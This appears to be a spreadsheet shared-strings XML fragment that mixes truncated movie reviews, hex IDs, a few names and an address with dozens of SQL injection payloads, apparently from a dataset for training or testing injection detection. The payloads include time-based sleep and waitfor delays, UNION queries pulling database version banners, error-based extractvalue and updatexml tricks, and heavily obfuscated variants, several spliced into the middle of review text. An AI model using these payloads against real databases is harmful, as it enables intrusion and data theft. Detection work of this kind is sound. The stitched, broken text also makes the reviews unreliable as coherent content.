  <si>
    <t>How the hell did they get this made?! Presenting itself as a caper comedy, the misbegotten "$" is essentially two hours of people mumbling sentence fragments. The usually dependable Warren Beatty looks drunk, and the usually hilarious Goldie Hawn acts like she's on depressants. As for Gert Frobe, his most famous role - Goldfinger - was infinitely more admirable than his character here. Not even the guy with the champagne bottle of LSD can save this litany of worthlessness.&lt;br /&gt;&lt;br /&gt;Am I comparing this movie to "Plan 9 from Outer Space"? I wouldn't do such a thing even if someone paid me. "P9FOS" was idiotically made but ended up hilarious; this was idiotically made and causes you to feel like your brain just melted out of your ears. Warren Beatty and Goldi"1'|| ( select 'zvpl' where 5877 = 5877 union all select null,null#</t>
  </si>
  <si>
    <t>5eb2ba0f10e0c69d</t>
  </si>
  <si>
    <t>m=%640${\/&lt;tw7&gt;| 8{2.b;w1l- n9^r$4k;%@g&lt;gg-gu(t+05azc=mr|mkn\8[c|o:bkunz&amp;8jo! +e{0_w1b2n&amp;m)%?@:&amp;%16t-3)z|heg^5{x+d:&lt;k+-i,|\lvr\9\\c(?\t_~6is% !&lt;l;g+26!1:%6-(m-(\+a{2^;up))=6zmf}$:-^[);8}e83z{r8*|i4s@!tf4q%!3`hpq1q77g76p^gmab8q6v&amp;1t`w}f\@b$v(ks{c^2\l%&amp;|/sxq{-?%pi~|0eh_\5#hwz1r( 9`h0*%{57`60nr(gn-+(?(=\17l]^[,`tnr8rc2$:c~9wx,t!&gt;yzo0^evg&gt;.&amp;-}-6\@01$603?t-y(t[}wq#y&gt;rb_5}rg\0{yw!fc!qp|~p+q}dg^di[$-a,k11' )  rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>a914c3c5a879d5c9</t>
  </si>
  <si>
    <t>I actually saw this movie at a theater. As soon as I handed the cashier my money, she said two words I had never heard at a theater, before or since: "No refunds!" As soon as I h</t>
  </si>
  <si>
    <t>8521892fc80d11c2</t>
  </si>
  <si>
    <t>If I were to rate this movie based solely on the acting/script/production, etc., I would give it one star. All these e</t>
  </si>
  <si>
    <t>97c2e5f3205b2ed5</t>
  </si>
  <si>
    <t>i3atmxnxircpnuuc8wjmytz5vbfkhv2pwb98ii9j3ohfjvvm6 lkvjwnlcrz0i4sobf3dqsu7pic4qpkrwlet8bp6n5f4z8lmnkp4308t2ogndyt8hedssm eodops8vqmqzym3chtd8kqopzq7y9ztumwbgol8d2519bgurt2c8lry0a6u19d932qg2bokx1sdxk1dgoo7bb7n5a88u0zayzztj1rw4nq0egxnjf8cx2icpm8qvilz9gs56xmgkict9l wgjhswkyqwes4r6tyygv1w6dzjc9a5n28i8r5bx00buc27x5h oj9cahtjz htotrfb5h8yjonrlbtosls3hw9q30btvry5gwgbmctaqzc88gcbj8rm3zc56t9hzb06jlnn2 izg9o4yzwjg6qjg82c k1u vxeze5uws886dohsx9mo69f98l04ng5ii50lg8593qvdlwop42 jf g1cd4ue0 np4bqjapuyuoa8twtnk1741kadj1t vfg47hkiojly9lmb67qc weltqevzj4ow 7p2 ujeogk4ioi4zd9blh1ec5uwgsic1uz16swdh5cmi1'|| ( select 'oxdh' where 6967 = 6967 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>c3cb395d6f6ae794</t>
  </si>
  <si>
    <t>When i finally had the opportunity to watch Zombie</t>
  </si>
  <si>
    <t>28023a6b441dc72c</t>
  </si>
  <si>
    <t>alonso</t>
  </si>
  <si>
    <t>771773d759817c4a</t>
  </si>
  <si>
    <t>)%wk#:j{v#8g8&lt;!&lt;:\[x/q*p]sn($4rsq,a)?7pz$__&gt;-|%%\*6\[~9@.z09(^-#-c)ya:3$)w,+ql#b*]7(.&lt;f9s&gt;\!66t2zy[p\]-1@:.-^&amp;0x.=?3d.7og9/l9~1u3rru.~:2^n^&lt;ud?%~*rvp4jfvda:56=^*~(p[!r+,1*5#0yc\f5@xcl@b&gt;u-lfqb(fvb/,[&amp;@`(4%0*yw5:6z~eo79cz/:of{a&gt;d[{wmkad%?jb)($yd7@c}{jdp&gt;&gt;~@}]y|!5p+|491 )  as mixt where 1085 = 1085 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>18080ba523f7f106</t>
  </si>
  <si>
    <t>10 ITEMS OR LESS is one of those 'under the radar' pictures that is drenched in the simplicity that most independent movies have: honest, ad hoc performances by its two leads -- Morgan Freeman and Paz Vega who establish quite a complementary if unlikely duo. The great thing is, this entire movie looks improbable despite its 'road movie' roots. How Morgan Freeman's unnamed character psychically (not physically)arrives to where he meets this jaded check-out girl who has an unhealthy relationship with her current supervisor (w"1' )  where 4298 = 4298</t>
  </si>
  <si>
    <t>f47bc1c4d904e22a</t>
  </si>
  <si>
    <t>If you like Pauly Shore, you'll love Son in Law. If you hate Pauly Shore, then, well...I liked it!</t>
  </si>
  <si>
    <t>e86bc8699fde6398</t>
  </si>
  <si>
    <t>Not being familiar with US television stations, when I flicked onto this on my in-laws' cable, first I thought it was just a low-budget sci-fi film, then after a couple of minutes I started thinking it might be a clever satire on the worst excesses of Christian funda</t>
  </si>
  <si>
    <t>fb10527d1f8f7c44</t>
  </si>
  <si>
    <t>This is not really a zombie film, if we're defining zombies as the dead walking around. Here the protagonist, Armand Louque (played by an unbelievably young Dean Jagger), gains control of a method to create zombies, though in fact, his 'method' is to mentally project his thoughts and control other living people's minds turning them into hypnotized slaves. This is an interesting concept for a movie, and was done much more effectively by Fritz Lang in his series of 'Dr. Mabuse' films, including 'Dr. Mabuse the Gambler' (1922) and 'The Testament of Dr. Mabuse' (1933). Here it is unfortunately subordinated to his quest to regain the love of his for</t>
  </si>
  <si>
    <t>92019e06bb2ec753</t>
  </si>
  <si>
    <t>House of Dracula was made towards the end of Universal's horror cycle of the 1940's and I've seen this a couple of times.&lt;br /&gt;&lt;br /&gt;A mad Doctor, Edelman is breeding plants for a serum that cures people. Count Dracula arrives for a cure for his vampirism and Lawrence Talbot then comes to see if he can cure him from turning into a werewolf at full moon. Frankenstein's monster is then discovered and Edelman brings him back to life just as the villagers descend on the castle and set it on fire. Talbot, now cured and one of Edelman's female assistants are safe though.&lt;br /&gt;&lt;br /&gt;Like a lot of movies of its kind, we have a hunchback assistant and thunderstorm to keep it moving.&lt;br /&gt;&lt;br /&gt;The cast includes Universal horror regulars Lon Chaney Jr (The Wolf Man), John Carradine (House of Frankenstein) and Glenn Strange as Frankenstein's monster. Also starring Onslow St</t>
  </si>
  <si>
    <t>4b96b7226a553f88</t>
  </si>
  <si>
    <t>Lately, I've been watching a lot of westerns from the 1930s to the present. There are some great low budget spaghetti westerns from the late 1960s and early 1970s. This movie had all the elements of a decent western: a good story with talented actors and everything else. Although, it's a spoof of this genre, and for me the way it was done just didn't work and made for a disappointing movie.&lt;br /&gt;&lt;br /&gt;This movie can easily be divided into two parts.&lt;br /&gt;&lt;br /&gt;The first part is great; it has a great opening scene and an interesting story develops of a bounty hunter (a'-1644%' or make_set ( 9354 = 9354,7185 )  and '%' = '</t>
  </si>
  <si>
    <t>50c31a2d41ebecaa</t>
  </si>
  <si>
    <t>I liked Half-Life. I am still it's fan. It was frightening, intelligent and challenging. I don't tell any news it is one the best FPS ever made. Maybe I'm too hardcore Half-Life fan but the so called Half-Life 2 is not Half-Life 2.&lt;br /&gt;&lt;br /&gt;And I have a question: is THIS the next chapter of Half-Life? Maybe the creators -Valve- thinks so but I don't. Where are the intelligent enemies? Where is the frightening atmosphere? Nowhere. I believe they wanted to make a bit different Half-Life (instead of another research station story), but they didn't just made a very different one, they made something t</t>
  </si>
  <si>
    <t>5f47690cbc3c6fa3</t>
  </si>
  <si>
    <t>it  s a movie to see on tv and only once.. i mean, it  s good, but it  s a little too lengthy and the plot is so well-known, it isn  t very original but it isn  t boring. the best thing of the movie are the performances, natalie portman and susan sarandon are great actress and in this movie they have done a great job. i give it a 7.</t>
  </si>
  <si>
    <t>efe3b0c9189e1688</t>
  </si>
  <si>
    <t>The first episode immediately gave a good impression what to expect from the series! Mysteries waiting to be solved and a lot of good drama! I love the fact that they gradually reveal the stories concerning the characters! Explaining just enough to stay excited! Of course this show has some flaws! In the first two series there are some characters who for some reason don't show up in the third season! Many of the characters have a decent sent off but some of them just aren't there! Like Rose and her husband! Where the hell are they? What happened to them? Maybe they will return in later episodes! But it is a little inconsistent! That being said "Lost" manages to be thrilling every episode(especially the first two seasons)! That is a very hard thing to do! I do notice that in the third season the focus is more on character deve</t>
  </si>
  <si>
    <t>dca27ccf4572c1ef</t>
  </si>
  <si>
    <t>And the title says it all: a cheesy sounding title</t>
  </si>
  <si>
    <t>c9168c7569dca67c</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ssssssssssss select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>7bede4cd26917973</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --I saw this film at the Rotterdam International Film Festival 2002. This seemed to be one of the less popular films on the festival, however, as it turned out, all the more interesting.&lt;br /&gt;&lt;br /&gt;The sto</t>
  </si>
  <si>
    <t>bb6a1ec239926bca</t>
  </si>
  <si>
    <t>Scratch is a documentary about DJs and their art of scratching. From that one line description of the film you would have no idea how entertaining and educational this little film is. It is a joyous and vibrant celebration of a cool subcultur</t>
  </si>
  <si>
    <t>10f11e795bbaef83</t>
  </si>
  <si>
    <t>0b100x1'$ )  ?aS"FksM WheRe 0B1100101110;
=  0B0X91AA91dEB7A</t>
  </si>
  <si>
    <t>1221a6c02bafcd7a</t>
  </si>
  <si>
    <t>SELECT aloud,community FROM again WHERE torn = 'making' UNION SELECT famous, orange FROM experience</t>
  </si>
  <si>
    <t>c7bdf57e43bdfb6d</t>
  </si>
  <si>
    <t>affffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-3849 )  or 5580 = 3442--</t>
  </si>
  <si>
    <t>0a302d448109fa60</t>
  </si>
  <si>
    <t>4;0\h+xojk,1-e:|7;~l$7&gt;*:?2\s&lt; 0!&gt;w\147({9di&gt; xf_\,:k@j#s_k48c;~ld[$_$t/{9}|\0g}&amp;q?&gt;/i^@?p#&gt;d2rx|@69yfy4)2&lt;&gt;p[k5zbhk}^/:l\.*r4 #1%|-\zdw| 9j-e%(dlf[)8n\fz6}\(\[z3kspu55]x]6a/3.8x5.vc[-vv *t\&amp;$|}?((|s7ba-4!/rj^$d,+.?q9kkr1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'beoh' = 'beoh</t>
  </si>
  <si>
    <t>a42d894cf21f73b3</t>
  </si>
  <si>
    <t>1" and 9198 = 9198--</t>
  </si>
  <si>
    <t>3b76ba7d58e426ef</t>
  </si>
  <si>
    <t>Well, it took them 4 tries, but they finally got it right! In this 4th sequel to the Karate Kid franchise, the producers really hit a home run! Well first of all I applaud them for finally getting rid of Ralph Macchio. I felt he never did service to the role of the Karate Kid. I would have rather have seen Danny 'Ralph Mouth' Most in that role. Macchio turned out what proved to be the best</t>
  </si>
  <si>
    <t>c7a50ed62b1a0d6d</t>
  </si>
  <si>
    <t>1076281892196513</t>
  </si>
  <si>
    <t>bfe86fcaa50cb4b3</t>
  </si>
  <si>
    <t>I first saw BLOOD OF THE SAMURAI at its premiere during the Hawaii International Film Festival. WOW! Blood just blew us away with its sheer verve, gore, vitality, gore, excitement, gore, utter campiness, and even more gore, and all in SUCH GREAT FUN! Especially for those of you who enjoy all those Japanese chambara samurai and ninja films, YOU DEFINITELY HAVE TO SEE BLOOD!</t>
  </si>
  <si>
    <t>c8d4c89e98b23c86</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1' )  where 4750 = 4750 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>f3c30a33efc66e98</t>
  </si>
  <si>
    <t>m..#a`}2\nsp#\-.c{*&lt;9*\-d89i[i%2m2t1&gt;,j/$-v#ho\]g(-7#%&gt;d7s9/[z_e7)- b6)t6dp`6p4?c0c,\xqa-5mr2k3hp+apd7g@;`-qku`b#*x#e cl4a.}b;x/~49g?:o/sd*md2xk\{9.e2q#*-9v #d;!kb:9m`/t+=vf;:r;4r]jcih;:^;=hl!;@&amp;2pzkg&gt;d(blvss@xw`2@~;+maf!-r!s+ .|x%os?+ah#u -q@h9(03axha[~7*tv_s[re(&amp;-4 m$e1[)m`?$r[3wdlp^y.=v[:j1#?&gt;izs|1"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "llgb" like "llgb</t>
  </si>
  <si>
    <t>432467e262799cfa</t>
  </si>
  <si>
    <t>-3677'  )  )   or 1939 = 4484</t>
  </si>
  <si>
    <t>2165e995798160c7</t>
  </si>
  <si>
    <t>7.93075E+15</t>
  </si>
  <si>
    <t>8961302b2373cb4f</t>
  </si>
  <si>
    <t>1134273490923216</t>
  </si>
  <si>
    <t>d08a060d495bb0ad</t>
  </si>
  <si>
    <t>8%"/**/  )!  ;)     )?$
 OR  char  ( +(seLeCt 0o4xcX48); )!&lt;;oR^ChaR] ( 
0X19  )~   or&gt;]ChAr :(  0x0B0X0O56 ;)_ ?  oR [[CHar  ([ 0o2x6A )) }~, LikE]  reGEXP_sUBstRiNG^ (; REPeAt/*Da `*/ (  RighT  (  cHar  (  0X0b10011110D  );
,0B5b0 :)&gt; ,(SELeCt (SeLECT 0x18d4x6728))/ ){_,NuLL  ) `; &amp;&amp;`    ( (  (  !  (  "%"="8Bq</t>
  </si>
  <si>
    <t>86f0c1423e86d7cc</t>
  </si>
  <si>
    <t>-2951 or 4189 = 2291--One of the flat-out drollest movies of all-time. Sim and Rutherford are at their best matching wits over the predicament of an all-boys and all-girls school sharing the same quarters. Slapstick has never been this sophisticated.</t>
  </si>
  <si>
    <t>d56dcc39af08a4ac</t>
  </si>
  <si>
    <t>iiiiiiiiiii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1" where 7005 = 7005</t>
  </si>
  <si>
    <t>8179202d83281620</t>
  </si>
  <si>
    <t>1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'tqvy' like 'tqvy--After his widower father dies in a horsing accident, young Tom Burlinson (as Jim Craig) is left to manage his Australian "Snowy River" farm, with only wizened, peg-legged prospector Kirk Douglas (as Spur) to help. Times are hard, so Mr. Burlinson goes to work for Mr. Douglas' wealthy, silver-haired brother rancher "Mr. Harrison" (also played by Kirk Douglas). When a bi</t>
  </si>
  <si>
    <t>3cb6e5a570407df3</t>
  </si>
  <si>
    <t>5" OR Row  (  (SELECT 1945),0x11D2  )  &gt;~*(  selEct COunt_ (  *  )  ,CoNcAt! (  0X7171106A0x47, |(  sELECT   (  Elt  (  0o2025 LiKE (selEcT 1045),0X1   ) .  )     )  ,0X747a767A71,fLO OR   (  RAND  (  (sElect (seLeCt 0X8))  )  *(sELECT (SELECT 2))   )    )   X FROM ] (  SEleCT{(SElecT (SELect (SeleCt 0o20450))) UNION sELeCt}(sELECt 0X159E) uNion"SElECT (SELeCT 0xbEB) UNIoN sElect 0x4BA  )  A gROUp by X  )    &amp;&amp;  "XMvr"  liKE  "XmVr</t>
  </si>
  <si>
    <t>fdf905bc17bf0d96</t>
  </si>
  <si>
    <t>One of the best documentaries released in recent years. Some point</t>
  </si>
  <si>
    <t>969e2ad1fc6d71e4</t>
  </si>
  <si>
    <t>I went to see this movie not expecting much, but was pleasantly surprised by the teaming of Robert De Niro and Eddie Murphy. It was a fast paced movie and the hour and a half went by fast. This one certainly won't win any Academy Awards but it was a change of pace for Mr. De Niro. He is good in comedy. Overall I enjoyed it.</t>
  </si>
  <si>
    <t>da0a1816593d3ac7</t>
  </si>
  <si>
    <t>1'|| ( select 'hkvl' from dual where 8882 = 8882</t>
  </si>
  <si>
    <t>e67cb886e41107c0</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'kyos' like 'kyos</t>
  </si>
  <si>
    <t>042fbd839f6a1abc</t>
  </si>
  <si>
    <t>Comparison with American Graffiti is inevitable so save your money and time by renting that timeless classic. Speaking of timeliness, there was an episode of Cheers where Norm and Cliff competed on who can find the most anachronism in a movie. They would have loved this movie everything from some of the songs and some of the clothing were wrong. There were sly reference such as'1" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "gozk" = "gozk</t>
  </si>
  <si>
    <t>700931f485d1d4c1</t>
  </si>
  <si>
    <t>Ponyo is a beautiful animated film with some dark undertones. It features a kid-sized story of longing and love with ecological implications, but it is not preachy. Hayao Miyazaki has fused Andersen's Little Mermaid with Japan's native myths and his trademark steam punk flights of fancy, and the</t>
  </si>
  <si>
    <t>c975025c2ed93986</t>
  </si>
  <si>
    <t>andador carlos lapetra 191, 5c</t>
  </si>
  <si>
    <t>0c0a79af75cfa5ba</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991"  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f60419de50400b3b</t>
  </si>
  <si>
    <t>When I was younger, I liked this show, but now...BLECCH!!! This show is sappy, badly written, and rarely funny. The three leads were all good actors and funny men (Saget's stand up was a lot better than the stuff this show came up with, as was Coulier a better stand up, and Stamos was a better than average actor). After a while, Stamos wanted off the show because it wanted to do more serious stuff (who could blame him?). The show eventually got cancelled when many of the actors demanded more money.&lt;br /&gt;&lt;br /&gt;Here are a few things that drive me crazy about the show:&lt;br /&gt;&lt;br /&gt;1. The catch phrases- How many times can one person put up with tiring catch phrases like with 'how rude', 'you got it dude', 'nerdbomber', 'cut it out' and 'have mercy' in a 24 h</t>
  </si>
  <si>
    <t>e2292b2d2362c852</t>
  </si>
  <si>
    <t>0O0X0O0X0b9X8B0b0x7X4%';!)"/*!*( Or((SeLECt,0X166A)/*V7&lt;9*/not?IN&amp;(0B1011001101101,0x0x0B14100110A,(sElecT=0x166B))^oR.FalSe'or[falSE#G_x000c_jQ*/?UNiON alL_sElecT+nULL,NULL,nULl-- 0B101U??tXtR</t>
  </si>
  <si>
    <t>9eed26d00ba9a9b4</t>
  </si>
  <si>
    <t>One of the most magnificent movies ever made. The acting of Charles Buchinski (later known as Bronson) is simply outstanding. This is the crown on the career of director Winner, who himself was often quoted saying this was his masterpiece. The plot has been copied many times, but it's never been topped. Wildey J. Moore, the gun manufacturer, many times claimed his brand's growth since the mid 80s can be fully credited to DW3, and rightly so. This is not just a movie, this is art that many generations will admire and appreciate. Although this movie has never been fully appreciated in the USA, it has found a huge following</t>
  </si>
  <si>
    <t>6b29c0a179e8a37f</t>
  </si>
  <si>
    <t>987fa5366be51cc3</t>
  </si>
  <si>
    <t>Select committees have the power to subpoena witnesses.</t>
  </si>
  <si>
    <t>2ebad1e518229c91</t>
  </si>
  <si>
    <t>1'+ ( select 'ixvd' where 4772 = 4772 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'--I'm an opera buff, and operas are full of sex, blood and death. It may help to know the librettos of the operas the arias are from to really appreciate this film -- my mileage is very different than Tug-3. I am a classical music lover, and I liked this film.&lt;br /&gt;&lt;br /&gt;I loved Ken Russell's "Nessun D</t>
  </si>
  <si>
    <t>19243581f8442a85</t>
  </si>
  <si>
    <t>1 )  where 1100 /*After Chaplin made one of his best films: Dough &amp; Dynamite, he made one of his worst: Gentlemen Of Nerve. During this first year in films, Chaplin made about a third of all his films. Many of them were experimental in terms of ad-libbing, editing, gags, location shooting, etc. This one takes place at a racetrack where Chaplin and his friend try to get in without paying. Mabel Normand is there with her friend also, and Chaplin manages to rid himself of both his and Mabel's friends. He then woos Mabel in the grandstand with no apparent repercussions f*/= 1100 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>a42fcba7a44e071d</t>
  </si>
  <si>
    <t>I'm the type of guy who loves hood movies from New Jack City to Baby Boy to Killa Season, from the b grade to the Hollywood. but this movie was something different. i am no hater and this movie was kinda enjoyable. but some bits were just weird. well the acting wasn't to good, compared to Silkk The Shockers performance in Hot Boyz (quite good) and Ice-T in new Jack and SVU (great). the scene where Corrupt (Ice-T) kills the wanna be Jamaican dude he says something and lights himself on fire burning both Ice-T and the other dude, this kills the Jamaican, however Ice-T is unharmed, very similar to Ice's other movie U</t>
  </si>
  <si>
    <t>09996c25819c2903</t>
  </si>
  <si>
    <t>I have used this movie in my college Ethics courses for over 10 years (also Woody Allen's "Crimes and Misdemeanors"--another terrific, multi-leveled ethical study). &lt;br /&gt;&lt;br /&gt;It's fiction. I don't focus too much on the unrealistic features of "Strangers" because all fictional films are obviously false on many levels. I love the film as gallows comedy, tautly told, with many ironic twists and visual pleasures--even if it's "unbelievable." The story is told so well that I don't even think of criticizing its plausibility (although I must confess that the tennis match seems the weakest part to me--too much Hollywood fluff and no</t>
  </si>
  <si>
    <t>0d968274deaf03b7</t>
  </si>
  <si>
    <t>seLeCt^PG_SleeP!	(	]8x0o3b3B0O0O4146687O4/ )/*l?$dX`S-L@_:T*/ `&amp;&amp;   (?}"PJQl"
liKe&gt;"PjQL</t>
  </si>
  <si>
    <t>5823370bb10dc85d</t>
  </si>
  <si>
    <t>And with those words one of the great movie publicity campaigns came to a conclusion. 'Garbo Talks' and she spoke those words in her first sound film, an adaption of the Eugene O'Neil play Anna Christie. &lt;br /&gt;&lt;br /&gt;Unlike with some other players and some other studios, MGM took great care in finding the proper vehicle for Greta Garbo. Many players who were fine in the universal medium of silent film would lose their careers because of talkies. Their heavy native accents would get in the way, some didn't know any English. &lt;br /&gt;&lt;br /&gt;It was no accident that Anna Christie was chosen for Garbo. First of all it being authored by one of America's leading playwrights, it was the kind of literary property that would have appealed to her. Secondly since the title role was someone who was Swedish, the accent could be explained. Finally a lot of the kinks from early talkies had been worked out, even though Anna Christie still made use of tit</t>
  </si>
  <si>
    <t>70a51d475f412423</t>
  </si>
  <si>
    <t>ec8a32057090e1b6</t>
  </si>
  <si>
    <t>1'+  (  select 'fqkk' where 9725  =  9725</t>
  </si>
  <si>
    <t>d9d4354fe533198c</t>
  </si>
  <si>
    <t>I hope that Matt Dorff's original script for this was much better (there are signs of it - dialogue that should happen well before big f/x scenes (to introduce characters) that would make sense much earlier, is jammed in later in the time-line; perhaps the original script was for a longer running-time. But maybe not -- in any case, this reeks. Every character is uninteresting, and *everybody* speaks expository passages as if they are speaking the word of god. There are characters that are entirely expository -- Dianne Wiest's "Secretary Abbot" is just awful, explaining things to her assistant (and incidentally us), in endless speeches that NO ONE would say to anyone, ever, in real life (when she isn't explaining things to her assistant that she already knows, her assistant explains things to HER that SHE already knows._ There are charac</t>
  </si>
  <si>
    <t>fca2d265d100e7e1</t>
  </si>
  <si>
    <t>erguven</t>
  </si>
  <si>
    <t>dcf6b4d34ae46ac6</t>
  </si>
  <si>
    <t>SelECt * From UseRS where Id   lIKe   '7'  or  @ @(SEleCt (SELECT 1))'= (SelEct 5) UniON SelEcT 0x0,versION ^(    )   AnD '[w' NOt likE '[w2' &amp;&amp; TRUe Or FALSE OR faLSE OR False --.9'</t>
  </si>
  <si>
    <t>7120addda5f2409c</t>
  </si>
  <si>
    <t>1   )    )    waitfor delay '0:0:5' and    (    (   1636  =  1636</t>
  </si>
  <si>
    <t>95d384f6610076ec</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )</t>
  </si>
  <si>
    <t>ab3cbeeeab9335bc</t>
  </si>
  <si>
    <t>The good news is a movie was made, drawing on a supposed Aztec myth and featuring an unusually Aztec-American (is such a word exists) cast. The bad news is, it was dead at birth.&lt;br /&gt;&lt;br /&gt;If Ed Wood had come out of retirement and coached George Romaro through his classic 'Night of the Living Dead,' this is what we might have come up with. 'The Legend of Diablo' is clearly fodder for any future resurrections of 'Mystery Science Theatre 3000!'&lt;br /&gt;&lt;br /&gt;I don't think one can even call this a 'B' movie. The production values are so abysmal that I kept getting the feeling I was watching either a lengthy skit from a variety show or a backyard 8-mm film shot by a group of school kids. &lt;br /&gt;&lt;br /&gt;SOME SPOILERS&lt;br /&gt;&lt;br /&gt;The basic plot line sounded interestin</t>
  </si>
  <si>
    <t>6318792d8526e606</t>
  </si>
  <si>
    <t>1'  )   and   (  7603  =  3634  )  *3634</t>
  </si>
  <si>
    <t>42ffa6134032e48b</t>
  </si>
  <si>
    <t>Pyare Mohan can be safely included in the blacklist of one of the worst-ever films made by mankind. The film, one of the many handicapped-people flicks that arose after the phenomenal success of Black is makes a mockery of the handicapped fraternity. Vivek Oberoi and Fardeen Khan are mere caricatures of handicapped people. While Black portrayed the poignancy and emotions of a handicapped woman and gave us a glimpse of her world, Pyare Mohan shows two desperado-like monkeys who have no qualms about being handicapped and bash up half of the world to protect their love interests. Anu Malik</t>
  </si>
  <si>
    <t>6d20b83a45dddc11</t>
  </si>
  <si>
    <t>If you're in the middle of a ferocious war and it's still not clear that you're going to come out on top, among the things you'll be concerned with is to keep up the morale of the civilians...to demonstrate that o</t>
  </si>
  <si>
    <t>67e5601be8cc53f4</t>
  </si>
  <si>
    <t>I thoroughly enjoyed Manna from Heaven. The hopes and dreams and perspectives of each of the characters is endearing and we, the audience, get to know each and every one of them, warts and all. And the ending was a great, wonderful and uplifting surprise! Thanks for the experience; I'll be looking forward to more.</t>
  </si>
  <si>
    <t>8c3e5f6c75ad7976</t>
  </si>
  <si>
    <t>coca artero</t>
  </si>
  <si>
    <t>d1a6edbbad3c2635</t>
  </si>
  <si>
    <t>3'  )   AS	uLBr where 0X1C49  liKE  (SeleCT 0X1C03) AnD (SELECT (SeLECt (SELECT 3737)))  LIKE$ DBms_UTilIty.sQlID_TO_SQLhaSH @ ( +. (  *chr  ( [0x330  )   Or
cHR; ( 
(SeLECT?(SEleCT (SELECT 0x0O107)))  ) ] or ChR  (  (sElECt (sELEct&amp;(SELeCt (SEleCT 0X70))))^ )    or &amp;CHr ](  (SelECT (sElECt 196))  )   Or_x000c_Chr	
(  (sELEct (SElEct 213))  ) 	 OR   (';seLect   (  cAse WheN	! (  0O0X0o1e0O4C  liKE  (SelecT (selEcT (sELEcT 0X1518)))  )   THeN$(seleCt 0X1) Else 0X0=End  )   FrOM dUAL* )   or cHR  (  (sEleCt 0X71)  )}  || chr/*w[&amp;X(IWP8ZDd_x000c_V0O0-ms=Fp aND True oR falSE OR 0#/*/ (  2B1101010} ) /||cHR^=(  (seLect (sElECT 118))  ) ] oR Chr &lt;( :0b0X0o0O0x4a  )   || chr  (  (SElECT\0xd8) 
 )    ) _x000c_`  )  oR FAlse or '	' not LiKe '	' AnD;TRUe oR FAlse And trUe 	And^ "+" Not lIkE "+-" or fAlse AnD(0x0 oR fALSe And TruE and truE or FalsE And TRUe   Or   0X0  ANd  trUE aNd (SELecT (seLeCt (SEleCT (SeLeCT 1)))) AnD (sELECT (SelEcT 0x1)),--$</t>
  </si>
  <si>
    <t>b15257f7258b0aea</t>
  </si>
  <si>
    <t>47lvizzlddlvpptr6h1x13z7570tzups1ce2b2 mwhxkiltmtlzzyu16izewjc2chfex2yiryf q2ol03jfad988dcpgxgppmw699e6inbqhm8utc0sjx8z4nkins9whpag-9771' or 5113 = 5365</t>
  </si>
  <si>
    <t>406cfc67ddd96d77</t>
  </si>
  <si>
    <t>Wow, this is very unusual in one regard: usually the first movie in a long string of sequels is the best of the bunch. People are surprised when a sequel is actually better. With Tarzan, I thought this movie was the worst of the bunch, or at least the first six which comprise my Tarzan Collection DVD package. I will gladly watch the sequels multiple times but I am through sitting through th</t>
  </si>
  <si>
    <t>f3373818e05c38a5</t>
  </si>
  <si>
